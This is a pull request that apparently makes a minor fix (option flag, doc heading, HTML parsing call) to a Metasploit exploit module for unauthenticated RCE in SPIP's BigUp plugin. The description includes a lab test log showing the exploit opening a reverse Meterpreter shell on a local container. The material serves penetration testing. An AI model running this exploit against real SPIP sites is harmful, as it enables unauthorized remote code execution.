### PR TITLE
Minor fix for SPIP BigUp Unauthenticated RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
@@ -59,7 +59,8 @@ docker run --name casse-spip -p 8000:80 \
 
 ## Options
 
-- **FORM_PAGE**: This option allows you to specify a custom page on the target SPIP installation that contains a form.
+### FORM_PAGE
+This option allows you to specify a custom page on the target SPIP installation that contains a form.
 By default, the module will automatically check the `login`, `spip_pass`, and `contact` pages for forms,
 but if you know of another page that contains a form, you can specify it here.
 For example, if an article page contains a form, you can set this option like so:

--- a/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
+++ b/modules/exploits/multi/http/spip_bigup_unauth_rce.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('FORM_PAGE', ['false', 'A page with a form.', 'Auto'])
+        OptString.new('FORM_PAGE', [true, 'A page with a form.', 'Auto'])
       ]
     )
   end
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       next unless res&.code == 200
 
-      doc = Nokogiri::HTML(res.body)
+      doc = res.get_html_document
       action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text
       args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text
 


### PR DESCRIPTION
Minor fix applied for the PR #19444

Test after the minor change.
```
msf6 exploit(multi/http/spip_bigup_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/spip_bigup_unauth_rce) > set rport 8000
rport => 8000
msf6 exploit(multi/http/spip_bigup_unauth_rce) > exploit

[*] Started reverse TCP handler on 172.20.61.76:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.3.1
[+] SPIP version 4.3.1 is vulnerable.
[*] Bigup plugin version detected: 3.2.11
[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
[*] Found formulaire_action: login
[*] Found formulaire_action_args: x3Pao8dUn+DNUAaKwJ9uP...
[*] Preparing to send exploit payload to the target...
[*] Sending stage (39927 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.20.61.76:4444 -> 172.17.0.2:40454) at 2024-09-11 11:45:23 -0400

meterpreter > sysinfo
Computer    : 42013bb9ea3e
OS          : Linux 42013bb9ea3e 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64
Meterpreter : php/linux
meterpreter >
``` 